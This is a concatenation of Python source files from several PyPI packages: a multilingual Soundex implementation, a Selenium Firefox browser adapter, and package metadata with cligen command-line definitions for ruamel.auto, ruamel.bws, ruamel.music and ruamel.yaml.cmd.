    _vowels_table = str.maketrans('aoeiyu', 'AABBBC')
    _table = str.maketrans('bpfvcksgjqxzdtlmnr', '112233344555667889')

    def _replace_vowels_seq(self, word):
        """Normalise common English vowel sequences before coding.

        NOTE(review): the substitution order is load-bearing -- later
        patterns operate on the output of earlier ones.
        """
        word = self._ye_ending.sub('je', word)
        word = self._au_ending.sub('o', word)
        word = self._ea_ending.sub('e', word)
        word = self._oo_ue_ew_ending.sub('u', word)
        word = self._iey_ending.sub('ei', word)
        word = self._iye_ire_ending.sub('ai', word)
        word = self._ere_ending.sub('ie', word)
        return word

    def transform(self, word):
        """
        Converts a given word to Soundex code
        :param word: string
        :return: Soundex string code
        """
        word = self._hw_replacement.sub('', word)
        if self.code_vowels:
            word = self._replace_vowels_seq(word)
        return self._apply_soundex_algorithm(word)
class FinnishSoundex(Soundex):
    """
    Soundex for Finnish language
    """
    _ts_replacement = re.compile(r'ts', re.IGNORECASE)
    _x_replacement = re.compile(r'x', re.IGNORECASE)
    _vowels = 'aäeioöuy'
    _vowels_table = str.maketrans('aäoeiöuy', 'AAABBBCC')
    _table = str.maketrans('bpfvcszkgqdtlmnrj', '11223334445567789')

    def transform(self, word):
        """Return the Soundex code for *word*.

        Finnish-specific digraphs are normalised first: 'ts' collapses to
        's', and 'x' expands to 'ks'; the generic pipeline then codes the
        normalised word.
        """
        normalised = self._ts_replacement.sub('s', word)
        normalised = self._x_replacement.sub('ks', normalised)
        return self._apply_soundex_algorithm(normalised)
class RussianSoundex(Soundex):
    _vowels = 'аэиоуыеёюя'
    # Vowel grouping used in code_vowels mode.
    _vowels_table = str.maketrans('аяоыиеёэюу', 'AAAABBBBCC')
    # Voiced/voiceless consonant pairs map onto the same digit.
    _table = str.maketrans('бпвфгкхдтжшчщзсцлмнр', '11223334455556667889')
    # Adjective/pronoun endings -его/-ого (pronounced with 'в').
    _ego_ogo_endings = re.compile(r'([ео])(г)(о$)', re.IGNORECASE)
    _ia_ending = re.compile(r'[еи][ая]', re.IGNORECASE)
    _ii_ending = re.compile(r'и[еио]', re.IGNORECASE)
    # Phonetic rewrites applied (in insertion order) before coding:
    # iotation of я/ю/е/ё, й -> j, consonant-cluster simplification,
    # soft/hard sign removal, affricate merging.
    _replacement_map = {
        re.compile(r'(^|ъ|ь|' + r'|'.join(_vowels) + r')(я)', re.IGNORECASE): 'jа',
        re.compile(r'(^|ъ|ь|' + r'|'.join(_vowels) + r')(ю)', re.IGNORECASE): 'jу',
        re.compile(r'(^|ъ|ь|' + r'|'.join(_vowels) + r')(е)', re.IGNORECASE): 'jэ',
        re.compile(r'(^|ъ|ь|' + r'|'.join(_vowels) + r')(ё)', re.IGNORECASE): 'jо',
        re.compile(r'й', re.IGNORECASE): 'j',
        re.compile(r'([тсзжцчшщ])([жцчшщ])', re.IGNORECASE): r'\2',
        re.compile(r'(с)(т)([лнц])', re.IGNORECASE): r'\1\3',
        re.compile(r'(н)([тд])(ств)', re.IGNORECASE): r'\1\3',
        re.compile(r'([нс])([тд])(ск)', re.IGNORECASE): r'\1\3',
        re.compile(r'(р)(д)([чц])', re.IGNORECASE): r'\1\3',
        re.compile(r'(з)(д)([нц])', re.IGNORECASE): r'\1\3',
        re.compile(r'(в)(ств)', re.IGNORECASE): r'\2',
        re.compile(r'(л)(нц)', re.IGNORECASE): r'\2',
        re.compile(r'[ъь]', re.IGNORECASE): '',
        re.compile(r'([дт][зсц])', re.IGNORECASE): 'ц'
    }

    def __init__(self, delete_first_letter=False, delete_first_coded_letter=False,
                 delete_zeros=False, cut_result=False, seq_cutted_len=4,
                 code_vowels=False, use_morph_analysis=False):
        """
        Initialization of Russian Soundex object
        :param delete_first_letter:
        :param delete_first_coded_letter:
        :param delete_zeros:
        :param code_vowels:
        :param cut_result:
        :param seq_cutted_len:
        :param use_morph_analysis: use morphological grammems for phonemes analysis
        :param code_vowels: group and code vowels as ABC letters
        """
        super(RussianSoundex, self).__init__(delete_first_letter, delete_first_coded_letter,
                                             delete_zeros, code_vowels, cut_result, seq_cutted_len)
        self.use_morph_analysis = use_morph_analysis
        # NOTE(review): "_moprh" is a typo for "_morph" (kept for compatibility).
        self._moprh = pymorphy2.MorphAnalyzer()

    def _replace_ego_ogo_endings(self, word):
        # -его/-ого -> -ево/-ово (how the ending is pronounced).
        return self._ego_ogo_endings.sub(r'\1в\3', word)

    def _use_morph_for_phoneme_replace(self, word):
        # Apply the -его/-ого rule only to adjectives, numerals and pronouns.
        parse = self._moprh.parse(word)
        if parse and ('ADJF' in parse[0].tag or 'NUMB' in parse[0].tag or 'NPRO' in parse[0].tag):
            word = self._replace_ego_ogo_endings(word)
        return word

    def _replace_vowels_seq(self, word):
        # Normalise vowel sequences before grouping (code_vowels mode).
        word = self._ii_ending.sub('и', word)
        word = self._ia_ending.sub('я', word)
        return word

    def transform(self, word):
        """
        Transforms a word into a sequence with coded phonemes
        :param word: string
        :return: Soundex string code
        """
        if self.use_morph_analysis:
            word = self._use_morph_for_phoneme_replace(word)
        for replace, result in self._replacement_map.items():
            word = replace.sub(result, word)
        if self.code_vowels:
            word = self._replace_vowels_seq(word)
return self._apply_soundex_algorithm(word) | /ru_soundex-1.1.1.tar.gz/ru_soundex-1.1.1/ru_soundex/soundex.py | 0.591015 | 0.243873 | soundex.py | pypi |
from __future__ import print_function
from __future__ import absolute_import
# Package/release metadata; presumably consumed by the ruamel packaging
# tooling (setup.py) -- TODO confirm.
_package_data = dict(
    full_package_name='ruamel.auto',
    version_info=(1, 6, 4),
    __version__='1.6.4',
    version_timestamp='2022-09-21 10:06:53',
    author='Anthon van der Neut',
    author_email='a.van.der.neut@ruamel.eu',
    description='automate testing and pep8 conformance of python code',
    toxver=['2.7'],
    entry_points='auto=ruamel.auto.__main__:main',
    since=1998,
    install_requires=['ruamel.yaml', 'ruamel.std.pathlib', 'ruamel.showoutput'],
    universal=True,
)
# Re-exported at module level for consumers of the package version.
version_info = _package_data['version_info']
__version__ = _package_data['__version__']
_cligen_data = """\
# all tags start with an uppercase char and can often be shortened to three and/or one
# characters. If a tag has multiple uppercase letter, only using the uppercase letters is a
# valid shortening
# Tags used:
# !Commandlineinterface, !Cli,
# !Option, !Opt, !O
# - !Option [all, !Action store_true, !Help build sdist and wheels for all platforms]
# !PreSubparserOption, !PSO
# !Alias for a subparser
# - !DefaultSubparser # make this (one) subparser default
# !Help, !H
# !HelpWidth 40 # width of the left side column width option details
# !Argument, !Arg
# - !Arg [files, nargs: '*', !H files to process]
# !Module # make subparser function calls imported from module
# !Instance # module.Class: assume subparser method calls on instance of Class imported from module
# !Main # function to call/class to instantiate, no subparsers
# !Action # either one of the actions in cligen subdir _action (by stem of the file) or e.g. "store_action"
# !Config YAML/INI/PON read defaults from config file
# !AddDefaults ' (default: %(default)s)'
# !Prolog (sub-)parser prolog/description text (for multiline use | ), used as subparser !Help if not set
# !Epilog (sub-)parser epilog text (for multiline use | )
# !NQS used on arguments, makes sure the scalar is non-quoted e.g for instance/method/function
# call arguments, when cligen knows about what argument a keyword takes, this is not needed
!Cli 0:
- !PSO [no-clear, !Action store_true, !Help test and clear between runs]
- !PSO [display, !Help test and clear + display file contents of DISPLAY]
- !PSO [show-pdf, !Action store_true, !Help show pdf file once (when auto-ing an .rst file)]
- !PSO [each, e, !Action store_true, !Help test and try each argument seperately]
- !PSO [testverbose, t, default: 0, !Action store_true, !Help add -v to py.test invocation]
- !PSO [pep8, p, !Action store_true, !Help run pep8 on all argument files]
- !PSO [flake8, !Action store_true, !Help run flake8 on all argument files]
- !PSO [proceed, P, !Action store_true, !Help proceed with command after running pep8/flake8]
- !PSO [todo-pdf, metavar: ID, !Help run todo --show-pdf on todo item %(metavar)s]
- !PSO [todo-html, metavar: ID, !Help run todo --show-html on todo item %(metavar)s]
- !PSO [stats, !Action store_true, !Help show statistics after run]
- !PSO [prof, !Action store_true, !Help 'run -m cProfile [-s time|--prof-arg]']
- !PSO [prof-arg, !Action append]
- !PSO [prof-lines, type: int, default: 30]
- !PSO [python2, py2, '2', !Action store_true, !Help run with python2]
- !PSO [python3, py3, '3', !Action store_true, !Help run with python3]
- !PSO [last, l, !Action store_true, !Help "this sets the command to the first previous command,\n from the bash commandline, that does not start with \"auto \".\n Normally used in order not to retype and/or quote something\n your tried\
\ just before. Set 'alias auto=\"history -a | auto\"'.\n "]
- !PSO [cligen, C, !Action store_true, !Help "run cligen, ignore change of __main__.py, so you can use 'auto --cligen -c xxx *.py'"]
- !PSO [errorexit, E, !Action store_true, !Help 'used to test autotest.py, stop processing further commands on error']
- !PSO [command, c, !Action append, !Help command to be run on changes (multiple)]
- !PSO [arg, !Action append, !Help arguments to pass to file to test]
- !Arg [filenames, nargs: '*']
- !Opt [verbose, v, !Help increase verbosity level, !Action count, const: 1, nargs: 0, default: 0]
- !Opt [quiet, q, !Help decrease verbosity level, !Action count, const: -1, nargs: 0]
- !PSO [no-auto-dev, !Help do not check and restart auto when **its** sources change]
- !Instance ruamel.auto.auto.Auto
""" # NOQA | /ruamel.auto-1.6.4.tar.gz/ruamel.auto-1.6.4/__init__.py | 0.534127 | 0.280099 | __init__.py | pypi |
from __future__ import print_function, absolute_import, division, unicode_literals
# Package/release metadata; presumably consumed by the ruamel packaging
# tooling (setup.py) -- TODO confirm.
_package_data = dict(
    full_package_name="ruamel.browser.server.selenium",
    version_info=(0, 1, 2),
    author="Anthon van der Neut",
    author_email="a.van.der.neut@ruamel.eu",
    description="selenium firefox browser plugin",
    # keywords="",
    entry_points=None,
    license="MIT License",
    since=2016,
    status=u"β",  # the package status on PyPI
    install_requires=dict(
        any=["ruamel.appconfig", "ruamel.std.argparse", "selenium", "ruamel.browser.server", ],
    ),
    classifiers=[
        "Operating System :: POSIX :: Linux",
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: Implementation :: CPython",
        "Topic :: Internet :: WWW/HTTP",
    ],
)
def _convert_version(tup):
"""Create a PEP 386 pseudo-format conformant string from tuple tup."""
ret_val = str(tup[0]) # first is always digit
next_sep = "." # separator for next extension, can be "" or "."
for x in tup[1:]:
if isinstance(x, int):
ret_val += next_sep + str(x)
next_sep = '.'
continue
first_letter = x[0].lower()
next_sep = ''
if first_letter in 'abcr':
ret_val += 'rc' if first_letter == 'r' else first_letter
elif first_letter in 'pd':
ret_val += '.post' if first_letter == 'p' else '.dev'
return ret_val
# Derive the public version string from the metadata tuple, then drop the
# helper so it does not leak into the package namespace.
version_info = _package_data['version_info']
__version__ = _convert_version(version_info)
del _convert_version
import os # NOQA
import time # NOQA
from glob import glob # NOQA
import selenium.common # NOQA
from selenium import webdriver # NOQA
from selenium.webdriver.common.action_chains import ActionChains # NOQA
from selenium.webdriver.support.ui import Select # NOQA
NSEE = selenium.common.exceptions.NoSuchElementException # NOQA
from ..browser import Browser, NoSuchElementException # NOQA
class SeleniumBrowser(Browser):
    """Adapter mapping the generic Browser command interface onto a
    selenium webdriver.

    The driver itself is created by a concrete subclass and stored in
    ``self._selenium``.  ``self._kw`` is an element store keyed by name,
    with '_' as the implicit "last element" slot; presumably initialised
    by the base Browser class -- TODO confirm.  Most commands return a
    string status ('ok' or a payload).
    """

    def __init__(self, name, **kw):
        self._selenium = None  # set by the concrete subclass
        super(SeleniumBrowser, self).__init__(name, **kw)

    @property
    def br(self):
        """The underlying selenium webdriver instance."""
        return self._selenium

    def get(self, url, elem):
        """Navigate the browser to *url*; *elem* is ignored."""
        print(u'getting [{}]'.format(url))
        self.br.get(url)
        return ''

    def keys(self, keys, elem, add=False):
        """Send *keys* to element *elem* (default '_'), clearing it first
        unless *add* is true."""
        if elem is None:
            elem = '_'
        if not add:
            self._kw[elem].clear()  # get rid of any previous non-recognised stuff
        self._kw[elem].send_keys(keys)
        return 'ok'

    def find(self, msg, elem):
        """find [use top] [store key] id|class|css rest
        if "use top" not provided search whole page
        if "store key" not provided only store in _
        rest can have spaces
        """
        # Search below a previously stored element, or the whole page.
        if elem is None:
            elem = self.br
        else:
            elem = self._kw[elem]
        try:
            store_key = None
            cmd, k, rest = msg.split(None, 2)
            if cmd == u'store':
                store_key = k
                msg = rest
        except ValueError:
            # fewer than three words -> no "store key" prefix present
            pass
        try:
            typ, msg = msg.split(None, 1)
            typ = typ.lower()
            if typ == 'id':
                res = elem.find_element_by_id(msg)
            elif typ == 'class':
                res = elem.find_element_by_class_name(msg)
            elif typ == 'css':
                res = elem.find_element_by_css_selector(msg)
            else:
                return "Not implemented: " + typ
            if store_key:
                self._kw[store_key] = res
            self._kw['_'] = res  # '_' always tracks the most recent find
            return 'ok'
        except NSEE:
            # translate the selenium exception into the server-level one
            raise NoSuchElementException
        except:
            print('rbs.selenium general raising')
            raise

    def select(self, msg, elem):
        """Select an option of the <select> element *elem* (default '_').

        The first word of *msg* is the selector type: index|text|value.
        """
        if elem is None:
            elem = '_'
        sel = Select(self._kw[elem])
        typ, msg = msg.split(None, 1)
        typ = typ.lower()
        if typ == 'index':
            sel.select_by_index(msg)
        elif typ == 'text':
            sel.select_by_visible_text(msg)
        elif typ == 'value':
            # BUG FIX: this branch previously called select_by_visible_text,
            # making "value" selection behave like "text" selection.
            sel.select_by_value(msg)
        else:
            return "Not implemented: " + typ
        return 'ok'

    def click(self, message, elem):
        """Click element *elem* (default '_'); *message* is ignored."""
        if elem is None:
            elem = '_'
        self._kw[elem].click()

    def inner(self, msg, elem):
        """normally used with element previously found
        msg part discarded
        """
        if msg:
            print('\nSeleniumBrowser.inner: unused {}\n'.format(msg))
        if elem is None:
            elem = '_'
        return self._kw[elem].get_attribute('innerHTML')

    def javascript(self, arg, elem):
        """Execute *arg* as JavaScript in the page; *elem* is ignored."""
        return self.br.execute_script(arg)

    def title(self, message, elem):
        """Return the current page title."""
        return self.br.title

    def current_url(self, message, elem):
        """Return the current page URL."""
        return self.br.current_url

    def hover(self, message, elem):  # untested
        if elem is None:
            elem = '_'
        # NOTE(review): self._browser is not set anywhere in this class
        # (other methods use self.br) -- verify before relying on hover.
        h = ActionChains(self._browser).move_to_element(self._kw[elem])
        h.perform()

    def mouse_down_up(self, elem):
        """Press-and-release the mouse on element *elem* (default '_'),
        holding the button for 0.5 seconds in between."""
        if elem is None:
            elem = '_'
        action = ActionChains(self.br)
        action.move_to_element(self._kw[elem])
        action.click_and_hold()
        try:
            action.perform()
        except:
            # best effort: keep going even if the press itself raises
            pass
        time.sleep(0.5)
        action = ActionChains(self.br)
        action.release()
        action.perform()

    # command aliases for mouse_down_up
    down_up = mouse_down_up
    downup = mouse_down_up

    def findallid(self, message, elem):
        """Return the 'id' attributes of all elements matching CSS selector
        *message* below *elem* (or the whole page), space separated."""
        res = []
        if elem is None:
            top = self.br
        else:
            top = self._kw[elem]
        for elem in top.find_elements_by_css_selector(message):
            res.append(elem.get_attribute('id'))
        return ' '.join(res)

    def displayed(self, message, elem):
        """Return 'yes'/'no' for visibility of element *elem* (default '_')."""
        if elem is None:
            elem = '_'
        return ('yes' if self._kw[elem].is_displayed() else 'no')

    def quit(self):
        """Shut down the webdriver."""
        self.br.quit()
# FirefoxSeleniumBrowser
class Browser(SeleniumBrowser):
    """Firefox-backed SeleniumBrowser.

    Tries to load an Adblock Plus extension and a saved profile from a
    selenium data directory; falls back to a plain Firefox session.
    """

    def __init__(self, name, **kw):
        # NOTE: deliberately(?) calls the grandparent __init__, skipping
        # SeleniumBrowser.__init__ -- self._selenium is assigned below.
        super(SeleniumBrowser, self).__init__(name, **kw)
        adblock_xpi = self.load_selenium_files('adblock/adblock_plus*.xpi')
        if adblock_xpi:
            try:
                ffprofile = webdriver.FirefoxProfile(self.load_selenium_files('profile00'))
                ffprofile.add_extension(adblock_xpi)
                self._selenium = webdriver.Firefox(ffprofile)
                return
            except Exception:
                print('exception in loading adblock', adblock_xpi)
                raise
        self._selenium = webdriver.Firefox()

    def load_selenium_files(self, pattern):
        """Return the newest path matching *pattern* under the known
        selenium data directories, or None if nothing matches.

        Directories searched: $RBSSELENIUM (if set), then
        /data1/DATA/selenium and /data0/DATA/selenium.
        """
        base_dirs = [os.environ.get('RBSSELENIUM')]
        for base_dir in ['/data1', '/data0']:
            base_dirs.append(os.path.join(base_dir, 'DATA', 'selenium'))
        for base_dir in base_dirs:
            if base_dir is None:
                # RBSSELENIUM was not set in the environment
                continue
            # BUG FIX: base_dir was previously ignored
            # (pat = os.path.join(pattern)), so only patterns relative to
            # the current working directory could ever match.
            pat = os.path.join(base_dir, pattern)
            res = glob(pat)
            if res:
                break
        else:
            return None
        return sorted(res)[-1]  # the newest one if multiple
# Package/release metadata; presumably consumed by the ruamel packaging
# tooling (setup.py) -- TODO confirm.
_package_data = dict(
    full_package_name='ruamel.bws',
    version_info=(0, 4, 1),
    __version__='0.4.1',
    version_timestamp='2021-11-06 08:30:19',
    author='Anthon van der Neut',
    description='browser restore to workspace',
    keywords='browser multiple workspace restore',
    author_email='a.van.der.neut@ruamel.eu',
    # install_requires=[],
    since=2014,
    print_allowed=True,
    classifiers=[
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        'Programming Language :: Python :: 3.9',
        'Programming Language :: Python :: 3.10',
        'Programming Language :: Python :: Implementation :: CPython',
        'Topic :: Internet :: WWW/HTTP :: Browsers',
    ],
    python_requires='>=3',
)
# Re-exported at module level for consumers of the package version.
version_info = _package_data['version_info']
__version__ = _package_data['__version__']
_cligen_data = """\
# all tags start with an uppercase char and can often be shortened to three and/or one
# characters. If a tag has multiple uppercase letter, only using the uppercase letters is a
# valid shortening
# Tags used:
# !Commandlineinterface, !Cli,
# !Option, !Opt, !O
# !PreSubparserOption, !PSO
# !Help, !H
# !Argument, !Arg
# !Module # make subparser function calls imported from module
# !Instance # module.Class: assume subparser method calls on instance of Class imported from module
# !Action # either one of the actions in subdir _action (by stem of the file) or e.g. "store_action"
# !Config YAML/INI/PON read defaults from config file
# !AddDefaults
# !Epilog epilog text (for multiline use | )
# !NQS used on arguments, makes sure the scalar is non-quoted e.g for instance/method/function
# call arguments, when cligen knows about what argument a keyword takes, this is not needed
!Cli 0:
- !Opt [verbose, v, !Help increase verbosity level, !Action count, const: 1, nargs: 0, default: 0]
- !Opt [keep, !Help 'max number of old saves to keep (default: %(default)s)', type: int, default: 10]
- !Instance ruamel.bws.browserworkspace.BrowserWorkspace
- !Config [INI, ~/.config/bws/bws.ini] # path for backwards compatibility
- save:
- !Opt [minwin, m, default: 3, type: int, metavar: N, !Help 'minimum number of windows that needs to be open to create a new save file (default: %(default)s)']
- !Opt [force, !Action store_true, !Help override (configured) minwin setting]
- !Opt [unlock-file, default: '/tmp/bws.restored', metavar: FILE, !Help 'file that has to exist when doing bws save --check (default: %(default)s)']
- !Opt [check, !Action store_true, !Help exit if file specified with --unlock-file doesn't exist]
- !Help "save the current setup, purging old versions\n (based on --keep)"
- list:
- !Help list availabel workspace setups
- restore:
- !Arg [position, nargs: '?', type: int, default: 0]
- !Opt [unlock, !Action store_true, !Help create file specified by --unlock-file]
- !Opt [unlock-file, default: '/tmp/bws.restored', metavar: FILE, !Help 'file that has to exist when doing bws save --check (default: %(default)s)']
- !Help restore workspace setup (defaults to most recent)
""" # NOQA | /ruamel.bws-0.4.1.tar.gz/ruamel.bws-0.4.1/__init__.py | 0.540439 | 0.316567 | __init__.py | pypi |
# Package/release metadata; presumably consumed by the ruamel packaging
# tooling (setup.py) -- TODO confirm.
_package_data = dict(
    full_package_name='ruamel.music',
    version_info=(0, 5, 0),
    __version__='0.5.0',
    version_timestamp='2022-09-25 12:37:15',
    author='Anthon van der Neut',
    author_email='a.van.der.neut@ruamel.eu',
    description='handling of music files: conversion, playing',
    toxver=['3.8'],
    entry_points='music=ruamel.music.__main__:main',
    install_requires=[
        'mutagen',
        'musicbrainzngs',
        'ruamel.yaml',
        'ruamel.doc.html',
        'ruamel.std.pathlib',
    ],
    license='Copyright Ruamel bvba 2013-2022',
    print_allowed=True,
    python_requires='>=3',
)
# Re-exported at module level for consumers of the package version.
version_info = _package_data['version_info']
__version__ = _package_data['__version__']
_cligen_data = """\
# all tags start with an uppercase char and can often be shortened to three and/or one
# characters. If a tag has multiple uppercase letter, only using the uppercase letters is a
# valid shortening
# Tags used:
# !Commandlineinterface, !Cli,
# !Option, !Opt, !O
# - !Option [all, !Action store_true, !Help build sdist and wheels for all platforms]
# !PreSubparserOption, !PSO
# !Alias for a subparser
# - !DefaultSubparser # make this (one) subparser default
# !Help, !H
# !HelpWidth 40 # width of the left side column width option details
# !Argument, !Arg
# - !Arg [files, nargs: '*', !H files to process]
# !Module # make subparser function calls imported from module
# !Instance # module.Class: assume subparser method calls on instance of Class imported from module
# !Main # function to call/class to instantiate, no subparsers
# !Action # either one of the actions in cligen subdir _action (by stem of the file) or e.g. "store_action"
# !Config YAML/INI/PON read defaults from config file
# !AddDefaults ' (default: %(default)s)'
# !Prolog (sub-)parser prolog/description text (for multiline use | ), used as subparser !Help if not set
# !Epilog (sub-)parser epilog text (for multiline use | )
# !NQS used on arguments, makes sure the scalar is non-quoted e.g for instance/method/function
# call arguments, when cligen knows about what argument a keyword takes, this is not needed
!Cli 0:
- !Opt [verbose, v, !Help increase verbosity level, !Action count, const: 1, nargs: 0, default: 0]
- !Opt [quiet, q, !Action count, dest: verbose, const: -1, nargs: 0]
- !PSO [dryrun, !Action store_true]
- !Instance xxx.xxx.XXX
- convert:
- !Opt [cue, !Help split args according to cue file and convert]
- !Opt [no-cue-check, !Action store_true, !Help do not check if there is a matching cue file]
- !Opt [force, !Action store_true, !Help force conversion even if target exists]
- !Opt [re-tag, retag, !Action store_true, !Help copy tags to existing files]
- !Opt [max-size, type: int, default: 32, !Help 'max file size to convert (default: %(default)sMb)']
- !Arg [args, nargs: +, !Help music files to convert]
- !Help convert music file
- check:
- !Opt [convert, !Action store_true, !Help convert files checked to be older/missing]
- !Help check if primary secondary conversion is necessary
- find:
- !Opt [artist, !Action store_true, !Help only show artist level]
- !Opt [album, !Action store_true, !Help only show album level]
- !Arg [args, nargs: +, !Help list of elements of filename to be found]
- !Help find some music file in primary or secondary format
- sort:
- !Opt [convert, !Action store_true, !Help generate secondary format from primary]
- !Opt [test, !Action store_true]
- !Opt [startwith, !Help only sort if starting with path]
- !Help sort tmp directory to the primary and secondary format
- flatten:
- !Arg [args, nargs: '*', !Help 'list of directories to recursively parse (default: . )']
- !Help flatten pictures into music directory (for picard to move along)
- analyse:
- !Arg [args, nargs: '*', !Help 'list of directories to recursively parse (default: . )']
- !Help analyse a directory tree, to find music
- cleanup:
- !Opt [dedup, !Action store_true, !Help check and remove old paths in primary and secondary storage]
- !Opt [year, !Action store_true, !Help move albums to original year]
- !Opt [gen, !Action store_true, !Help generate year related metadata file]
- !Help cleanup empty directories, old path formats, etc.
- meta:
- !Arg [args, nargs: +, type: ruamel.std.pathlib.Path, !Help music files to process]
- !Help show tag metadata
- image:
- !Opt [from, type: ruamel.std.pathlib.Path, !Help music file to read image from]
- !Opt [to, type: ruamel.std.pathlib.Path, !Help music file to write to]
- !Opt [all, !Action store_true]
- !Opt [mp3, !Action store_true]
- !Opt [check, type: ruamel.std.pathlib.Path, nargs: +, !Help check dirs for cover art]
- !Opt [get, type: ruamel.std.pathlib.Path, nargs: +, !Help get file cover art]
- !Help copy image from to
- html:
- !Opt [force, !Action store_true, !Help force conversion even if up-to-date]
- !Help generate html from .music.yaml
""" # NOQA | /ruamel.music-0.5.0-py3-none-any.whl/ruamel/music/__init__.py | 0.471953 | 0.313591 | __init__.py | pypi |
from __future__ import print_function, absolute_import, division, unicode_literals
# Package metadata in the standard ruamel layout; presumably consumed by the
# in-house release/packaging tooling -- confirm before renaming any key.
_package_data = dict(
    full_package_name='ruamel.yaml.cmd',
    version_info=(0, 6, 5),
    __version__='0.6.5',
    version_timestamp='2023-07-11 20:50:18',
    author='Anthon van der Neut',
    author_email='a.van.der.neut@ruamel.eu',
    description='commandline utility to manipulate YAML files',
    entry_points='yaml',
    license='MIT',
    since=2015,
    nested=True,
    install_requires=[
        # 'ruamel.std.argparse>=0.8',
        'configobj',
        'ruamel.yaml.convert>=0.3',
        'ruamel.yaml>=0.17.17',
        'ruamel.yaml.base',
        'lz4',
    ],
    extras_require={'configobj': ['configobj']},
    tox=dict(
        env='3',
    ),
    python_requires='>=3',
    print_allowed=True,
)
# module-level aliases for the version fields stored above
version_info = _package_data['version_info']
__version__ = _package_data['__version__']
_cligen_data = """\
# all tags start with an uppercase char and can often be shortened to three and/or one
# characters. If a tag has multiple uppercase letter, only using the uppercase letters is a
# valid shortening
# Tags used:
# !Commandlineinterface, !Cli,
# !Option, !Opt, !O
# !PreSubparserOption, !PSO
# !Help, !H
# !Argument, !Arg
# !Module # make subparser function calls imported from module
# !Instance # module.Class: assume subparser method calls on instance of Class imported from module
# !Action # either one of the actions in subdir _action (by stem of the file) or e.g. "store_action"
# !Config YAML/INI/PON read defaults from config file
# !AddDefaults
# !Epilog epilog text (for multiline use | )
# !NQS used on arguments, makes sure the scalar is non-quoted e.g for instance/method/function
# call arguments, when cligen knows about what argument a keyword takes, this is not needed
!Cli 0:
- !AddDefaults
- !Opt [verbose, v, !Help increase verbosity level, !Action count, const: 1, !Nargs 0, default: 0]
- !Opt [indent, metavar: IND, !Help 'set indent level (default: auto)']
- !Opt [bsi, dest: block_seq_indent, metavar: BLOCK_SEQ_IND, type: int, !Help 'set block sequence indent level (default: auto)']
# - !Opt [map_indent, metavar: M, type: int, !Help 'set indent level for mappings (default: auto)']
# - !Opt [seq_indent, metavar: M, type: int, !Help 'set indent level for sequences (default: auto)']
# - !Opt [offset, dest: seq_indicator_offset, metavar: OFFSET, type: int, !Help 'set block sequence indicator offset (default: auto), make sure there is enough space in the sequence indent']
# options for YAML output
- !Opt [flow, !Action store_true, !Help use flow-style YAML instead of block style]
- !Opt [semi, !Action store_true, !Help write block style YAML except for "leaf" mapping/dict]
- !Opt [literal, !Action store_true, !Help convert scalars with newlines to literal block style]
- !Opt [write, w, !Action store_true, !Help 'write individual .yaml files (reusing basename), instead of stdout']
- !Opt [output, o, metavar: OUT, !H 'write to file %(metavar)s instead of stdout']
- !Opt [smart-string, !Action store_true, !Help set literal block style on strings with \n otherwise plain if possible]
- !Instance ruamel.yaml.cmd.yaml_cmd.YAMLCommand
- rt:
- !Alias round-trip
- !Prolog round trip on YAML document, test if first or second round stabilizes document
- !Opt [save, !Action store_true, !Help "save the rewritten data back\n to the input file (if it doesn't exist a '.orig' backup will be made)\n "]
- !Opt [width, metavar: W, default: 80, type: int, !Help 'set width of output (default: %(default)s']
- !Arg [file, !Nargs +]
- !Help test round trip on YAML document
- me:
- !Alias merge-expand
- !Prolog expand merges in input file to output file
- !Opt [allow-anchors, !Action store_true, !Help allow "normal" anchors/aliases in output]
- !Arg [file, !Nargs 2]
- !Help expand merges in input file to output file
- json:
- !Alias from-json
- !Prolog convert JSON to block-style YAML
# - !Opt [flow, !Action store_true, !Help use flow-style instead of block style]
# - !Opt [semi, !Action store_true, !Help write block style except for "leaf" mapping/dict]
# - !Opt [literal, !Action store_true, !Help convert scalars with newlines to literal block style]
- !Opt [width, metavar: W, default: 80, type: int, !Help 'set width of output (default: %(default)s']
- !Opt [mozlz4, !Action store_true, !Help decode mozilla lz4]
# - !Opt [write, w, !Action store_true, !Help 'write a .yaml file, instead of stdout']
- !Arg [file, !Nargs +]
- !Help convert JSON to block-style YAML
- ini:
- !Alias from-ini
- !Prolog convert .ini/config file to block YAML
- !Opt [basename, b, !Action store_true, !Help 're-use basename of .ini file for .yaml file, instead of writing to stdout']
- !Opt [test, !Action store_true]
- !Arg [file]
- !Help convert .ini/config to block YAML
- pon:
- !Alias from-pon
- !Prolog convert .pon config file to block YAML
- !Arg [file, !Nargs +]
- !Help convert .pon config file to block YAML
- htmltable:
- !Prolog |
convert YAML to html tables. If hierarchy is two levels deep (
sequence/mapping over sequence/mapping) this is mapped to one table
If the hierarchy is three deep, a list of 2 deep tables is assumed, but
any non-list/mapp second level items are considered text.
Row level keys are inserted in first column (unless --no-row-key),
item level keys are used as classes for the TD.
- !Opt [level, !Action store_true, !Help 'print # levels and exit']
- !Opt [check]
- !Arg [file]
- !Help convert YAML to HTML tables
- from-html:
- !Prolog |
convert HTML to YAML. Tags become keys with as
value a list. The first item in the list is a key value pair with
key ".attribute" if attributes are available followed by tag and string
segment items. Lists with one item are by default flattened.
- !Opt [no-body, !Action store_true, !H drop top level html and body from HTML code segments]
- !Opt [strip, !Action store_true, !H strip whitespace surrounding strings]
- !Arg [file]
- !Help convert HTML to YAML
- from-csv:
- !Alias csv
- !Prolog |
convert CSV to YAML.
By default generates a sequence of rows, with the items in a 2nd level
sequence.
- !Opt [mapping, m, !Action store_true, !H 'generate sequence of mappings with first line as keys']
- !Opt [delimeter, metavar: DELIM, default: ',', !H 'field delimiter (default %(default)s)']
- !Opt [strip, !Action store_true, !H 'strip leading & trailing spaces from strings']
- !Opt [no-process, dest: process, !Action store_false,
!H 'do not try to convert elements into int/float/bool/datetime']
- !Arg [file]
- !Help convert CSV to YAML
- from-dirs:
- !Alias fromdirs
- !Prolog |
Combine multiple YAML files into one.
Path chunks (directories) are converted to mapping entries, the YAML contents
the value of the (last) key. If there are multiple files in one directory, the
filenames are used as well (or specify --use-file-name).
# - !Opt [output, o, !H 'write to file OUTPUT instead of stdout']
- !Opt [use-file-names, !Action store_true]
- !Opt [sequence, !Action store_true, !H 'no paths, each YAML content is made an element of a root level sequence']
- !Arg [file, !Nargs +, !H 'full path names (a/b/data.yaml)']
- !Help combine multiple YAML files into one
- pickle:
- !Alias [from-pickle, frompickle]
- !Prolog |
Load Python pickle file(s) and dump as YAML
